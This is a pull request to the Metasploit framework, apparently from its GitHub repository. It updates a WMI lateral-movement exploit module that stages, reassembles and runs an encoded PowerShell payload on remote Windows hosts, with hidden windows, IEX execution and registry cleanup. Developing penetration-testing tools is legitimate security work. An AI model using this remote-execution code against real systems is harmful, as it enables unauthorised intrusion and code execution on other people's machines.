### PR TITLE
WMIC ExtAPI Improvements

### DIFF
--- a/lib/msf/core/post/windows/wmic.rb
+++ b/lib/msf/core/post/windows/wmic.rb
@@ -27,7 +27,7 @@ module WMIC
     result_text = ""
 
     if datastore['SMBUser']
-      if server.downcase == "localhost" || server.downcase.starts_with("127.")
+      if server.downcase == "localhost" || server.downcase.starts_with?('127.')
         raise RuntimeError, "WMIC: User credentials cannot be used for local connections"
       end
     end

--- a/modules/exploits/windows/local/wmi.rb
+++ b/modules/exploits/windows/local/wmi.rb
@@ -83,8 +83,7 @@ class Metasploit3 < Msf::Exploit::Local
                       :encode_inner_payload => true,
                       :use_single_quotes => true }
     end
-    # Get the PSH Payload and split it into bitesize chunks
-    # 1024 appears to be the max value allowed in env vars
+
     psh = cmd_psh_payload(payload.encoded,
                           payload_instance.arch.first,
                           psh_options)
@@ -93,6 +92,8 @@ class Metasploit3 < Msf::Exploit::Local
       if load_extapi
         exec_cmd = psh
       else
+        # Get the PSH Payload and split it into bitesize chunks
+        # 1024 appears to be the max value allowed in env vars
         print_status("[#{server}] Storing payload in environment variables")
         chunks = split_code(psh, 1000)
         env_name = rand_text_alpha(rand(3)+3)

--- a/modules/exploits/windows/local/wmi.rb
+++ b/modules/exploits/windows/local/wmi.rb
@@ -27,9 +27,8 @@ class Metasploit3 < Msf::Exploit::Local
           the session's current authentication token instead of having to know
           a password or hash.
 
-          We do not get feedback from the WMIC command so there are no
-          indicators of success or failure. The remote host must be configured
-          to allow remote Windows Management Instrumentation.
+          The remote host must be configured to allow remote Windows Management
+          Instrumentation.
         },
         'License'       => MSF_LICENSE,
         'Author'        => [
@@ -76,42 +75,50 @@ class Metasploit3 < Msf::Exploit::Local
   end
 
   def run_host(server)
+    if load_extapi
+      psh_options = { :remove_comspec => true,
+                      :encode_final_payload => true }
+    else
+      psh_options = { :remove_comspec => true,
+                      :encode_inner_payload => true,
+                      :use_single_quotes => true }
+    end
     # Get the PSH Payload and split it into bitesize chunks
     # 1024 appears to be the max value allowed in env vars
     psh = cmd_psh_payload(payload.encoded,
                           payload_instance.arch.first,
-                          {
-                              :remove_comspec => true,
-                              :encode_inner_payload => true,
-                              :use_single_quotes => true
-                          })
-    chunks = split_code(psh, 1000)
+                          psh_options)
 
     begin
-      print_status("[#{server}] Storing payload in environment variables")
-      env_name = rand_text_alpha(rand(3)+3)
-      env_vars = []
-      0.upto(chunks.length-1) do |i|
-        env_vars << "#{env_name}#{i}"
-        c = "cmd /c SETX #{env_vars[i]} \"#{chunks[i]}\" /m"
-        result = wmic_command(c, server)
+      if load_extapi
+        exec_cmd = psh
+      else
+        print_status("[#{server}] Storing payload in environment variables")
+        chunks = split_code(psh, 1000)
+        env_name = rand_text_alpha(rand(3)+3)
+        env_vars = []
+        0.upto(chunks.length-1) do |i|
+          env_vars << "#{env_name}#{i}"
+          c = "cmd /c SETX #{env_vars[i]} \"#{chunks[i]}\" /m"
+          result = wmic_command(c, server)
 
-        unless result
-          print_error("[#{server}] WMIC command error - skipping host")
-          return false
+          unless result
+            print_error("[#{server}] WMIC command error - skipping host")
+            return false
+          end
         end
-      end
 
-      x = rand_text_alpha(rand(3)+3)
-      exec_cmd = generate_psh_command_line({
-        :noprofile => true,
-        :windowstyle => 'hidden',
-        :command => "$#{x}=''"
-      })
-      env_vars.each do |env|
-        exec_cmd << "+$env:#{env}"
+        x = rand_text_alpha(rand(3)+3)
+        exec_cmd = generate_psh_command_line({
+          :noprofile => true,
+          :windowstyle => 'hidden',
+          :command => "$#{x}=''"
+        })
+        env_vars.each do |env|
+          exec_cmd << "+$env:#{env}"
+        end
+        exec_cmd << ";IEX $#{x};"
       end
-      exec_cmd << ";IEX $#{x};"
 
       print_status("[#{server}] Executing payload")
       result = wmic_command(exec_cmd, server)
@@ -126,10 +133,12 @@ class Metasploit3 < Msf::Exploit::Local
         print_error("[#{server}] failed...)")
       end
 
-      print_status("[#{server}] Cleaning up environment variables")
-      env_vars.each do |env|
-        cleanup_cmd = "cmd /c REG delete \"HKLM\\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /V #{env} /f"
-        wmic_command(cleanup_cmd, server)
+      unless load_extapi
+        print_status("[#{server}] Cleaning up environment variables")
+        env_vars.each do |env|
+          cleanup_cmd = "cmd /c REG delete \"HKLM\\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /V #{env} /f"
+          wmic_command(cleanup_cmd, server)
+        end
       end
     rescue Rex::Post::Meterpreter::RequestError => e
       print_error("[#{server}] Error moving on... #{e}")


### PR DESCRIPTION
With the WMI calls available in ExtAPI we no longer need to stage the powershell payload in the environment variables, we can do a single call to execute it.

Also fixes an issue in Msf::Core::Post::WMIC which called `starts_with` instead of `starts_with?`

Resolves: https://github.com/rapid7/metasploit-framework/issues/4308
## Verification
- Set up a remote host which allows Windows Management Instrumentation: http://www.poweradmin.com/help/enablewmi.aspx
- Target that host
- Set credentials and payload
- Go. 
